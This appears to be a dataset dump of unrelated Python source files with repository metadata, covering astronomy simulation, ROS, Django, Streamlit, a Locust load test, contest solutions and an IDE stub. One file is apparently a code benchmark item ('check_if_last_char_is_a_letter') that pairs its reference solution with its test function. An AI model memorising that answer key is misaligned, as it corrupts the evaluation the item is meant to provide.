"vivek0@users.noreply.github.com"
] |
vivek0@users.noreply.github.com
|
f038abaec86c975b455f314fe8312b6fb4f3a83f
|
37930870719caede967fdf6905c032e22d086e8b
|
/scripts/imaging/simulators/instruments/vro.py
|
0990c9c9733733002ed6eb4a3accc03e6b77e72d
|
[] |
no_license
|
Cywtim/autolens_workspace
|
cbede944c0f85ee95cd7362fee957ef77e701280
|
da40cafee8dc26e5d8b1041888fb280598e74a5e
|
refs/heads/master
| 2023-04-05T14:22:06.091992
| 2021-04-15T20:29:28
| 2021-04-15T20:29:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,170
|
py
|
"""
Simulator: VRO
==============
This script simulates `Imaging` of a strong lens where:
- The resolution, PSF and S/N are representative of the Vera Rubin Observatory imaging.
"""
# %matplotlib inline
# from pyprojroot import here
# workspace_path = str(here())
# %cd $workspace_path
# print(f"Working Directory has been set to `{workspace_path}`")
from os import path
import autolens as al
import autolens.plot as aplt
"""
The `dataset_type` describes the type of data being simulated (in this case, `Imaging` data) and `dataset_name`
gives it a descriptive name. They define the folder the dataset is output to on your hard-disk:
- The image will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/image.fits`.
- The noise-map will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/noise_map.fits`.
- The psf will be output to `/autolens_workspace/dataset/dataset_type/dataset_label/dataset_name/psf.fits`.
"""
dataset_type = "instruments"
dataset_instrument = "vro"
"""
The path where the dataset will be output, which in this case is:
`/autolens_workspace/dataset/imaging/instruments/vro/mass_sie__source_sersic`
"""
dataset_path = path.join("dataset", "imaging", dataset_type, dataset_instrument)
"""
For simulating an image of a strong lens, we recommend using a Grid2DIterate object. This represents a grid of (y,x)
coordinates like an ordinary Grid2D, but when the light-profile`s image is evaluated below (using the Tracer) the
sub-size of the grid is iteratively increased (in steps of 2, 4, 8, 16, 24) until the input fractional accuracy of
99.99% is met.
This ensures that the divergent and bright central regions of the source galaxy are fully resolved when determining the
total flux emitted within a pixel.
"""
grid = al.Grid2DIterate.uniform(
shape_native=(100, 100), pixel_scales=0.2, fractional_accuracy=0.9999
)
"""
Simulate a simple Gaussian PSF for the image.
"""
psf = al.Kernel2D.from_gaussian(
shape_native=(21, 21), sigma=0.5, pixel_scales=grid.pixel_scales, normalize=True
)
"""
To simulate the `Imaging` dataset we first create a simulator, which defines the exposure time, background sky,
noise levels and psf of the dataset that is simulated.
"""
simulator = al.SimulatorImaging(
exposure_time=100.0, psf=psf, background_sky_level=1.0, add_poisson_noise=True
)
"""
Setup the lens galaxy's mass (SIE+Shear) and source galaxy light (elliptical Sersic) for this simulated lens.
"""
lens_galaxy = al.Galaxy(
redshift=0.5,
mass=al.mp.EllIsothermal(
centre=(0.0, 0.0),
einstein_radius=1.6,
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=45.0),
),
)
source_galaxy = al.Galaxy(
redshift=1.0,
bulge=al.lp.EllSersic(
centre=(0.1, 0.1),
elliptical_comps=al.convert.elliptical_comps_from(axis_ratio=0.8, angle=60.0),
intensity=0.3,
effective_radius=1.0,
sersic_index=2.5,
),
)
"""
Use these galaxies to setup a tracer, which will generate the image for the simulated `Imaging` dataset.
"""
tracer = al.Tracer.from_galaxies(galaxies=[lens_galaxy, source_galaxy])
"""
Lets look at the tracer`s image, this is the image we'll be simulating.
"""
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid)
tracer_plotter.figures_2d(image=True)
"""
We can now pass this simulator a tracer, which creates the ray-traced image plotted above and simulates it as an
imaging dataset.
"""
imaging = simulator.from_tracer_and_grid(tracer=tracer, grid=grid)
"""
Lets plot the simulated `Imaging` dataset before we output it to fits.
"""
imaging_plotter = aplt.ImagingPlotter(imaging=imaging)
imaging_plotter.subplot_imaging()
"""
Output the simulated dataset to the dataset path as .fits files.
"""
imaging.output_to_fits(
image_path=path.join(dataset_path, "image.fits"),
psf_path=path.join(dataset_path, "psf.fits"),
noise_map_path=path.join(dataset_path, "noise_map.fits"),
overwrite=True,
)
"""
Output a subplot of the simulated dataset, the image and a subplot of the `Tracer`'s quantities to the dataset path
as .png files.
"""
mat_plot_2d = aplt.MatPlot2D(
title=aplt.Title(label="Vero Rubin Observator Image"),
output=aplt.Output(path=dataset_path, format="png"),
)
imaging_plotter = aplt.ImagingPlotter(imaging=imaging, mat_plot_2d=mat_plot_2d)
imaging_plotter.subplot_imaging()
imaging_plotter.figures_2d(image=True)
tracer_plotter = aplt.TracerPlotter(tracer=tracer, grid=grid, mat_plot_2d=mat_plot_2d)
tracer_plotter.subplot_tracer()
"""
Pickle the `Tracer` in the dataset folder, ensuring the true `Tracer` is safely stored and available if we need to
check how the dataset was simulated in the future.
This will also be accessible via the `Aggregator` if a model-fit is performed using the dataset.
"""
tracer.save(file_path=dataset_path, filename="true_tracer")
"""
The dataset can be viewed in the folder `autolens_workspace/imaging/instruments/vro`.
"""
|
[
"james.w.nightingale@durham.ac.uk"
] |
james.w.nightingale@durham.ac.uk
|
f5316c97b47c37037e7f7584f2ad11d62837711b
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Games/Minecraft/pip/tests/test_help.py
|
b5a5f8aaba7742dfff1f6d49f2ba7a46eab76da7
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137
| 2023-08-28T23:50:57
| 2023-08-28T23:50:57
| 267,368,545
| 2
| 1
| null | 2022-09-08T15:20:18
| 2020-05-27T16:18:17
| null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:8a2ef4075a758034598401082ccea67056274e743bd8d3b71c91deb8be2b8201
size 1835
|
[
"nateweiler84@gmail.com"
] |
nateweiler84@gmail.com
|
a92d28836676c2ebdd4e48ad6ba6b45f2ddd5ddd
|
fd0eecb6d4f12eb326030c2f64892c6845668c4f
|
/docs/files/ros-service-call-logger.py
|
69929603c94693f175fcbc0234197cc7350d0cb4
|
[
"MIT"
] |
permissive
|
gramaziokohler/roslibpy
|
599eff049caa72ca0f23dbc8e4058e051e66556b
|
55e8f396f9e7b5d5669f6a31c2ed8d9bc33c3400
|
refs/heads/main
| 2023-08-31T22:57:32.502924
| 2023-03-29T14:52:31
| 2023-03-29T14:52:31
| 119,359,521
| 245
| 58
|
MIT
| 2023-08-29T14:22:35
| 2018-01-29T09:13:24
|
Python
|
UTF-8
|
Python
| false
| false
| 333
|
py
|
import roslibpy
client = roslibpy.Ros(host='localhost', port=9090)
client.run()
service = roslibpy.Service(client, '/rosout/get_loggers', 'roscpp/GetLoggers')
request = roslibpy.ServiceRequest()
print('Calling service...')
result = service.call(request)
print('Service response: {}'.format(result['loggers']))
client.terminate()
|
[
"casas@arch.ethz.ch"
] |
casas@arch.ethz.ch
|
70b061e799152084ad6f729509a14852526468f9
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/PHY_604_Computational_Methods_in_Physics_and_Astrophysics_II_Zingale/code1/monte_carlo/uniform_random/random_test.py
|
f5d708344cd250ad2e460372c9cb612844584e80
|
[] |
no_license
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134
| 2023-08-14T10:05:37
| 2023-08-14T10:05:37
| 72,460,321
| 223
| 174
| null | 2022-10-24T12:15:06
| 2016-10-31T17:24:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 919
|
py
|
# Do a simple random number generator based on the linear congruential
# generator
import matplotlib.pyplot as plt
class Rand(object):
def __init__(self, seed):
self.seed = seed
self.a = 16807 # 7**5
self.c = 0
self.M = 2147483647 # 2**31 -1
def ran(self):
xn = (self.a*self.seed + self.c) % self.M
self.seed = xn
# note that by dividing by M and not M-1, we will never get 1,
# so this gives #s in the range [0, 1)
return xn/float(self.M)
def test_random():
r = Rand(1)
x = []
for i in range(10000):
x.append(r.ran())
# make pairs out of successive points
x1 = x[1:]
x = x[:-1]
plt.scatter(x, x1, s=5)
plt.xlabel(r"$x_i$")
plt.ylabel(r"$x_{i+1}$")
plt.xlim(0,1)
plt.ylim(0,1)
plt.savefig("random.png", dpi=150)
if __name__ == "__main__":
test_random()
|
[
"me@yomama.com"
] |
me@yomama.com
|
ad8452aa80df9bf192b29494939440d87bd2230d
|
9a2b9a3873984e9f99cdc92be7d98af279fae36b
|
/app/users/locusts.py
|
c3021a34c5118e8f3272dba542cf12d9d34e453e
|
[] |
no_license
|
jeonyh0924/celery-test
|
4bf3832ef5e4175c7615051ccaefa131b65a01af
|
aad15232141d1f2ad69c5438030e9fcd707b6efa
|
refs/heads/master
| 2022-11-26T05:21:48.885913
| 2020-08-06T11:05:49
| 2020-08-06T11:05:49
| 284,411,009
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
import random
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(5, 9)
@task
def index_page(self):
self.client.get("/health")
def on_start(self):
pass
|
[
"hungyb0924@gmail.com"
] |
hungyb0924@gmail.com
|
76c69c71e2615a87f13d8098ced49b2265c3c1e8
|
3490103f9c3773a717b37c3e6bedc88b9cd83cd2
|
/setup.py
|
dd45809284ae6bf607d2dff2a2b681e1afbcbacd
|
[] |
no_license
|
vuchau/django-project-template
|
66cd4bf08c4b61be53d8aaed5e34d48b54901682
|
2510e82d50a705429cda96d7912d5056313c29b9
|
refs/heads/master
| 2021-01-18T08:05:53.465031
| 2015-01-24T22:12:12
| 2015-01-24T22:12:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 912
|
py
|
from setuptools import setup
from distutils.core import Command
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from django.conf import settings
settings.configure(
DATABASES={
'default': {
'NAME': ':memory:',
'ENGINE': 'django.db.backends.sqlite3'
}
},
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'toolbox',
)
)
from django.core.management import call_command
call_command('test', 'toolbox')
setup(
name='django-project-template',
cmdclass={'test': TestCommand}
)
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
a1e6e1348803e6d405076ffca4ed431681dfba1a
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02781/s238378799.py
|
717eeb5e77e1996b57354ee94c94ba90683c2808
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,263
|
py
|
#!/usr/bin/env python3
#%% for atcoder uniittest use
import sys
input= lambda: sys.stdin.readline().rstrip()
sys.setrecursionlimit(10**9)
def pin(type=int):return map(type,input().split())
def tupin(t=int):return tuple(pin(t))
def lispin(t=int):return list(pin(t))
#%%code
def resolve():
N=input()
K,=pin()
#degit DP
#dp_table["index"][smaller][cond]=cond:=ちょうどK個の数がある を満たす総数
rb=(0,1)
dp_table=[[[0 for cnd in range(K+1)]for sml in rb]for ind in range(len(N)+1)]
dp_table[0][0][0]=1
#print(dp_table)
#print("degit,sml,k,prove,l,x<n,dp_table[degit-1][sml][k]")#
for degit in range(len(N)+1):
n=int(N[degit-1])
for sml in rb:
t=10 if sml else int(N[degit-1])+1
for k in range(K+1):
for prove in range(t):
x=prove
try:#Indexerror
#print(degit,sml,k,prove,"l",x<n,dp_table[degit-1][sml][k])
#if sml==False and x==n:print(n,":")
dp_table[degit][sml or x<n][k+(x!=0)]+=dp_table[degit-1][sml][k]
except :pass
print(dp_table[-1][0][K]+dp_table[-1][1][K])
#print(dp_table)
#%%submit!
resolve()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
e117f4ebaad212623fc1ca4c75b0ce427a5091d7
|
501d029b5db8132feb1877f5e0898af7a301c910
|
/ex3_1.py
|
360851c26a0bb82dc626470c97dff2bdb4d8a0da
|
[] |
no_license
|
Everfighting/Learn-Python-the-Hard-Way
|
092b050d53bfca0f5bbc91e41ba1aacce2880cc1
|
51723bfc22472284b3902161627331882f0dbc6f
|
refs/heads/master
| 2020-04-05T22:55:02.550343
| 2017-08-22T06:13:36
| 2017-08-22T06:13:36
| 61,793,170
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
# coding=utf-8
import math
# 利用math模块中的乘方进行计算。
print math.pow(5,2)
# 利用内置算术运算符乘方
print 5**2
# 地板除,如果是整数相除,结果只是整数,小数部分去除。
# 在python3.0以上版本/结果含有小数,//才是地板除。
print 5/3
|
[
"cbb903601682@163.com"
] |
cbb903601682@163.com
|
eff753209513dfc927dc91a5466b6ddf7519166d
|
98364abec1f798ed6352a1c0eda080371aacb28d
|
/Medium/729/729.py
|
fa51d5f4b2ef64dd9ed676a463da821bf4475276
|
[] |
no_license
|
GuoYunZheSE/Leetcode
|
3d1b11d142734922acecf7ba5efbaf0f2ab26d81
|
45cabf05251711c6421c8c2ddbcc3fec9222f70a
|
refs/heads/master
| 2022-05-01T05:03:20.694729
| 2022-04-27T04:10:33
| 2022-04-27T04:10:33
| 161,486,806
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
import bisect
class MyCalendar:
# def __init__(self):
# self.left=None
# self.right=None
# self.available=[]
# def book(self, start: int, end: int) -> bool:
# if (start and end) or (start==0 and end) :
# if start<=end:
# # First Book
# if self.left==None:
# self.left=start
# self.right=end
# return True
# else:
# if end<=self.left :
# if end!=self.left:
# self.available.append((end,self.left))
# self.left=start
# return True
# if start>=self.right:
# if start!=self.right:
# self.available.append((self.right,start))
# self.right=end
# return True
# else:
# if len(self.available)>0:
# for inter in self.available:
# if inter[0]<=start and end<=inter[1]:
# self.available.remove(inter)
# if inter[0]!=start:
# self.available.append((inter[0],start))
# if inter[1]!=end:
# self.available.append((end,inter[1]))
# return True
# return False
# return False
# else:
# return False
# else:
# return False
def __init__(self):
self.arr = []
self.dict = {}
def book(self, start: int, end: int) -> bool:
if start in self.dict:
return False
if not self.arr:
self.arr.append(start)
self.dict[start] = end
return True
i = bisect.bisect_left(self.arr, start)
if i - 1 >= 0 and self.dict[self.arr[i - 1]] > start:
return False
if i < len(self.arr) and self.arr[i] < end:
return False
self.arr.insert(i, start)
self.dict[start] = end
return True
if __name__ == '__main__':
S=MyCalendar()
S.book(48,50)
print(S.book(0,6))
|
[
"guoyunzhe.se@gmail.com"
] |
guoyunzhe.se@gmail.com
|
f5b80ad74e9f4b8489d21edb746c9938cea79745
|
43f3b7e4a5b7a1210ffa72c5a855d7542d68290d
|
/Results/Python/Array/134.py
|
69581275b8fe467b583b69841182a4af0fcb49ac
|
[] |
no_license
|
bar2104y/Abramyan_1000_tasks
|
38e86e119245db4bac0483583cc16d8793d5689c
|
e0bf9f5e73d90b8eca3fe5ba7913ed12f18d989a
|
refs/heads/master
| 2021-06-05T18:05:09.788453
| 2020-06-30T19:52:31
| 2020-06-30T19:52:31
| 150,898,700
| 5
| 2
| null | 2018-10-02T17:16:28
| 2018-09-29T20:01:33
|
Python
|
UTF-8
|
Python
| false
| false
| 569
|
py
|
import math
from genarr import genRandomArr
x,y = [], []
n = int(input("N: "))
# for i in range(n):
# x.append(int(input("X: ")))
# y.append(int(input("Y: ")))
x,y = genRandomArr(n,-10,10), genRandomArr(n,-10,10)
def distanse(x1,y1,x2,y2):
return(math.sqrt((x2-x1)**2 + (y2-y1)**2))
maxd = 0
for i in range(len(x)):
print((x[i],y[i]))
for j in range(i+1,len(x)):
d = distanse(x[i],y[i],x[j],y[j])
if d > maxd:
ii,jj = i,j
maxd = d
print((x[ii],y[ii]), (x[jj],y[jj]), distanse(x[ii],y[ii], x[jj],y[jj]))
|
[
"bar2104y@yandex.ru"
] |
bar2104y@yandex.ru
|
92addd01fb60c32929e5a515f5a438f96f32715b
|
560c5d8226d74969c3fb467efd1d26178562e15c
|
/blog_api/users/signals.py
|
dcc3fa9d8133adbb65fc08daa0e17af6aee7ccfc
|
[
"MIT"
] |
permissive
|
beasyx0/blog_api
|
17f47fb1537d4b7e53822bbff507740363d909cc
|
8d984ee3f9b2b7ea35a847013743f236a1a67fdb
|
refs/heads/main
| 2023-06-30T02:08:40.190270
| 2021-08-04T02:09:53
| 2021-08-04T02:09:53
| 358,662,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
from django.contrib.auth.signals import user_logged_in # user_logged_out, user_login_failed
from django.db.models import signals
from django.dispatch import Signal
from django.db import transaction
from django.dispatch import receiver
from django.shortcuts import get_object_or_404
from django.utils import timezone
from django.contrib.auth import get_user_model
User = get_user_model()
from blog_api.users.models import User, VerificationCode, PasswordResetCode
@receiver(signals.post_save, sender=User)
def send_user_verification_email_signal(sender, instance, created, **kwargs):
'''Send user a verification email on first save.'''
if created:
code = VerificationCode.objects.create(user_to_verify=instance)
transaction.on_commit(
lambda: code.send_user_verification_email()
)
new_registration = Signal(providing_args=["ip_address", "user_username"])
@receiver(new_registration)
def record_ip_on_new_registration(sender, task_id, **kwargs):
username = kwargs['user_username']
ip_address = kwargs['ip_address']
user = get_object_or_404(User, username=username)
user.ip_address = ip_address
user.save()
|
[
"b_easyx@protonmail.com"
] |
b_easyx@protonmail.com
|
b797535219742d7c8b142f1d14633ac6f9165b4d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_138/1275.py
|
c8fd42dd2af78c90831cb28164d298f384b5d870
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
import os, sys
import itertools
lines = [line.strip() for line in open("%s" % sys.argv[1]).readlines()]
lines.reverse()
cases = lines.pop()
for case in range(int(cases)):
lines.pop()
lowers, highers = [], []
N = sorted(map(float,lines.pop().split(' ')))
K = sorted(map(float,lines.pop().split(' ')))
for i, n in enumerate(N):
try:
lower = max(filter(lambda x: x<n and x not in lowers, K))
lowers.append(lower)
except:
lower = None
try:
higher = max(filter(lambda x: x>n and x not in highers, K))
highers.append(higher)
except:
higher = None
print "Case #%s:" % (case+1),
print len(lowers),
print len(filter(lambda x: x[0] >x[1], [(n,K.pop(K.index(min(filter(lambda x: x>n, K) or K)))) for n in N]))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
fc717f0194925a31c30c22421f8fd0d344685fb7
|
14a6662a1b0a6d113dfb724382e3a7e2735bbbac
|
/Aula04/src/app.py
|
a75434ebdf760bdece64d6668611e4858a65f6f3
|
[] |
no_license
|
Karagul/streamlit_bootcamp
|
c118c01d9bec354eaabb504c9fd1d59dc5c63c93
|
48fa703ce7a2d4ac003fe881220cb66d926f17ca
|
refs/heads/main
| 2023-02-08T20:57:31.280465
| 2021-01-05T14:36:35
| 2021-01-05T14:36:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def carrega_dados(caminho):
dados = pd.read_csv(caminho)
return dados
def grafico_comparativo(dados_2019, dados_2020, causa, estado="BRASIL"):
if estado == "BRASIL":
total_2019 = dados_2019.groupby("tipo_doenca").sum()
total_2020 = dados_2020.groupby("tipo_doenca").sum()
lista = [int(total_2019.loc[causa]), int(total_2020.loc[causa])]
else:
total_2019 = dados_2019.groupby(["uf", "tipo_doenca"]).sum()
total_2020 = dados_2020.groupby(["uf", "tipo_doenca"]).sum()
lista = [int(total_2019.loc[estado, causa]),
int(total_2020.loc[estado, causa])]
dados = pd.DataFrame({"Total": lista,
"Ano": [2019, 2020]})
#plt.figure(figsize=(8, 6))
return sns.barplot(x="Ano", y="Total", data=dados)
#plt.title(f"Óbitos por {causa} - {estado}")
# plt.show()
def main():
obitos_2019 = carrega_dados("dados/obitos-2019.csv")
obitos_2020 = carrega_dados("dados/obitos-2020.csv")
figura = grafico_comparativo(obitos_2019, obitos_2020,
"SRAG")
st.title("Análise de Óbitos 2019-2020")
st.markdown("Este trabalho analisa dados dos **óbitos 2019-2020**")
st.pyplot(figura)
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
Karagul.noreply@github.com
|
5e7bfbedc16acf4ca6372e3a2381661d385fbfa6
|
092894284a5c5f29ff7d9323b854eb6781c64fab
|
/Res/Prefabs/GameObjects/player/ball.py
|
d9a59ff63f5dc80128a7526049375b631cd7da2a
|
[] |
no_license
|
sourenaKhanzadeh/breakoutgame
|
4660809ceae23b7b1bf587cc1bd6f94141f3c16f
|
87ee5933c6dde22f74ee22e5f40d016a4a4b22e9
|
refs/heads/master
| 2020-05-22T07:17:27.345601
| 2019-05-29T21:25:21
| 2019-05-29T21:25:21
| 186,262,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
from Prefabs.GameObjects.shapes.shapes import *
from Prefabs.GameObjects.bricks.bricks import Brick
from setting import *
class Ball(Circle):
def __init__(self, x=WIDTH // 2, y=WIDTH // 2, color=CC.RED, width=0, rad=10):
super().__init__(x, y, color, width, rad)
def move(self):
# go east if less than WIDTH
if self.getX() + self.getRad() + self.dx > WIDTH:
self.dx = -self.dx
# go west if less than WIDTH
elif self.getX() - (self.getRad() - self.dx) < 0:
self.dx = -self.dx
# if hit the up screen bounce down
if self.getY() + self.getRad() < 0:
self.dy = -self.dy
# debug the ball
self.debug(DEBUG)
# move x axis
self.incX(self.dx)
# move y axis
self.decY(self.dy)
def debug(self, active):
if active:
if self.getY() > HEIGHT:
self.setY(0)
def collision(self, col:Shape):
# very simple ball collision logic
if self.getY() - self.dy == col.getY() and \
col.getX() <= self.getX() <= col.getX() + col.getW():
self.dy = -self.dy
# if the collided is a brick then change the hit number of the brick
if len(col) == OO.BRICKS:
col.hits -= 1
def __len__(self):
return OO.BALL
|
[
"soure@DESKTOP-6PVNFEF.(none)"
] |
soure@DESKTOP-6PVNFEF.(none)
|
09275b427690ef44e7430628700f07f44cb8824f
|
627b050148e767be12cfc7dfa81b1c6368cf3104
|
/LeetCode/Apr20Challenge/Week4/day28_first_unique_number.py
|
dbac91abe928bd0387b8a926467a0d6759e87d98
|
[] |
no_license
|
imn00133/algorithm
|
6ce5d10491bde853eb9e4d6a69bde3124723875c
|
40d7bbe6e3cfe932122c32a9f730f951e948ef2d
|
refs/heads/master
| 2022-08-13T20:26:06.200622
| 2022-07-31T08:54:26
| 2022-07-31T08:54:26
| 231,281,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
#
# Solved Date: 20.04.28.
import collections
class FirstUnique:
def __init__(self, nums):
self.unique = None
self.next_unique_queue = collections.deque()
self.manage_unique = collections.defaultdict(int)
for number in nums:
self.manage_unique[number] += 1
if self.manage_unique[number] == 1:
self.next_unique_queue.append(number)
self.find_next_unique()
def show_first_unique(self) -> int:
if self.unique is not None:
return self.unique
else:
return -1
def add(self, value) -> None:
self.manage_unique[value] += 1
if self.manage_unique[value] == 1:
self.next_unique_queue.append(value)
if value == self.show_first_unique() or self.show_first_unique() == -1:
self.find_next_unique()
def find_next_unique(self):
while self.next_unique_queue:
number = self.next_unique_queue.popleft()
if self.manage_unique[number] == 1:
self.unique = number
break
else:
self.unique = None
def test():
queue = FirstUnique([2, 3, 5])
print(queue.show_first_unique())
queue.add(5)
print(queue.show_first_unique())
queue.add(2)
print(queue.show_first_unique())
queue.add(3)
print(queue.show_first_unique())
print()
queue = FirstUnique([7, 7, 7])
print(queue.show_first_unique())
queue.add(7)
queue.add(3)
queue.add(3)
queue.add(7)
queue.add(17)
print(queue.show_first_unique())
print()
queue = FirstUnique([809])
print(queue.show_first_unique())
queue.add(809)
print(queue.show_first_unique())
if __name__ == '__main__':
test()
|
[
"imn00133@gmail.com"
] |
imn00133@gmail.com
|
a669bc69cb66d9ef0348342ab4523d913845ef3c
|
ca3a49676cdf1016b2d729f0432b451d35b7a281
|
/human_eval/51b1be3f-d417-418d-9236-bf203e68cd76.py
|
68a5863b1201739cd1b33a0edc4579baab2e15f8
|
[
"MIT"
] |
permissive
|
SquareandCompass/code-align-evals-data
|
3bb71b605316f56bb27466f23706a329f3fb4938
|
97446d992c3785d6605f1500b2c9b95d042e7b9c
|
refs/heads/main
| 2023-06-19T12:47:56.277363
| 2021-07-21T00:22:56
| 2021-07-21T00:22:56
| 640,147,842
| 0
| 1
| null | 2023-05-13T06:22:30
| 2023-05-13T06:22:29
| null |
UTF-8
|
Python
| false
| false
| 1,269
|
py
|
ENTRY_POINT = 'check_if_last_char_is_a_letter'
#[PROMPT]
def check_if_last_char_is_a_letter(txt):
'''
Create a function that returns True if the last character
of a given string is an alphabetical character and is not
a part of a word, and False otherwise.
Note: "word" is a group of characters separated by space.
Examples:
check_if_last_char_is_a_letter("apple pie") ➞ False
check_if_last_char_is_a_letter("apple pi e") ➞ True
check_if_last_char_is_a_letter("apple pi e ") ➞ False
check_if_last_char_is_a_letter("") ➞ False
'''
#[SOLUTION]
check = txt.split(' ')[-1]
return True if len(check) == 1 and (97 <= ord(check.lower()) <= 122) else False
#[CHECK]
def check(candidate):
# Check some simple cases
assert candidate("apple") == False
assert candidate("apple pi e") == True
assert candidate("eeeee") == False
assert candidate("A") == True
assert candidate("Pumpkin pie ") == False
assert candidate("Pumpkin pie 1") == False
assert candidate("") == False
assert candidate("eeeee e ") == False
assert candidate("apple pie") == False
assert candidate("apple pi e ") == False
# Check some edge cases that are easy to work out by hand.
assert True
|
[
"barnes@openai.com"
] |
barnes@openai.com
|
a1e485a39c453c99a40f6f2d40cad085fe060fb2
|
c7a6f8ed434c86b4cdae9c6144b9dd557e594f78
|
/ECE364/.PyCharm40/system/python_stubs/348993582/nss/nss/RDN.py
|
0e53aeab1e6b2f125e445f912c8e9778bbce5a23
|
[] |
no_license
|
ArbalestV/Purdue-Coursework
|
75d979bbe72106975812b1d46b7d854e16e8e15e
|
ee7f86145edb41c17aefcd442fa42353a9e1b5d1
|
refs/heads/master
| 2020-08-29T05:27:52.342264
| 2018-04-03T17:59:01
| 2018-04-03T17:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,870
|
py
|
# encoding: utf-8
# module nss.nss
# from /usr/lib64/python2.6/site-packages/nss/nss.so
# by generator 1.136
""" This module implements the NSS functions """
# no imports
from object import object
class RDN(object):
"""
An object representing an X501 Relative Distinguished Name (e.g. RDN).
RDN objects contain an ordered list of `AVA` objects.
Examples::
RDN()
RDN(nss.AVA('cn', 'www.redhat.com'))
RDN([ava0, ava1])
The RDN object constructor may be invoked with zero or more
`AVA` objects, or you may optionally pass a list or tuple of `AVA`
objects.
RDN objects contain an ordered list of `AVA` objects. The
RDN object has both sequence and mapping behaviors with respect to
the AVA's they contain. Thus you can index an AVA by position, by
name, or by SecItem (if it's an OID). You can iterate over the list,
get it's length or take a slice.
If you index by string the string may be either a canonical name for
the AVA type (e.g. 'cn') or the dotted-decimal notation for the OID
(e.g. 2.5.4.3). There may be multiple AVA's in a RDN whose type matches
(e.g. OU=engineering+OU=boston). It is not common to have more than
one AVA in a RDN with the same type. However because of the possiblity
of being multi-valued when indexing by type a list is always returned
containing the matching AVA's. Thus::
rdn = nss.RDN(nss.AVA('OU', 'engineering'))
rdn['ou']
returns [AVA('OU=engineering')
rdn = nss.RDN(nss.AVA('OU', 'engineering'), nss.AVA('OU', 'boston'))
rdn['ou']
returns [AVA('OU=boston'), AVA('OU=engineering')]
Examples::
rdn = nss.RDN(nss.AVA('cn', 'www.redhat.com'))
str(rdn)
returns 'CN=www.redhat.com'
rdn[0]
returns an `AVA` object with the value C=US
rdn['cn']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
rdn['2.5.4.3']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
rdn.has_key('cn')
returns True because the RDN has a common name RDN
rdn.has_key('2.5.4.3')
returns True because the RDN has a common name AVA
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
len(rdn)
returns 1 because there is one `AVA` object in it
list(rdn)
returns a list of each `AVA` object in it
"""
def has_key(self, arg): # real signature unknown; restored from __doc__
"""
has_key(arg) -> bool
:Parameters:
arg : string or integer
canonical name (e.g. 'cn') or oid dotted-decimal or
SEC_OID_* enumeration constant
return True if RDN has an AVA whose oid can be identified by arg.
"""
return False
def __cmp__(self, y): # real signature unknown; restored from __doc__
""" x.__cmp__(y) <==> cmp(x,y) """
pass
def __getitem__(self, y): # real signature unknown; restored from __doc__
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __len__(self): # real signature unknown; restored from __doc__
""" x.__len__() <==> len(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
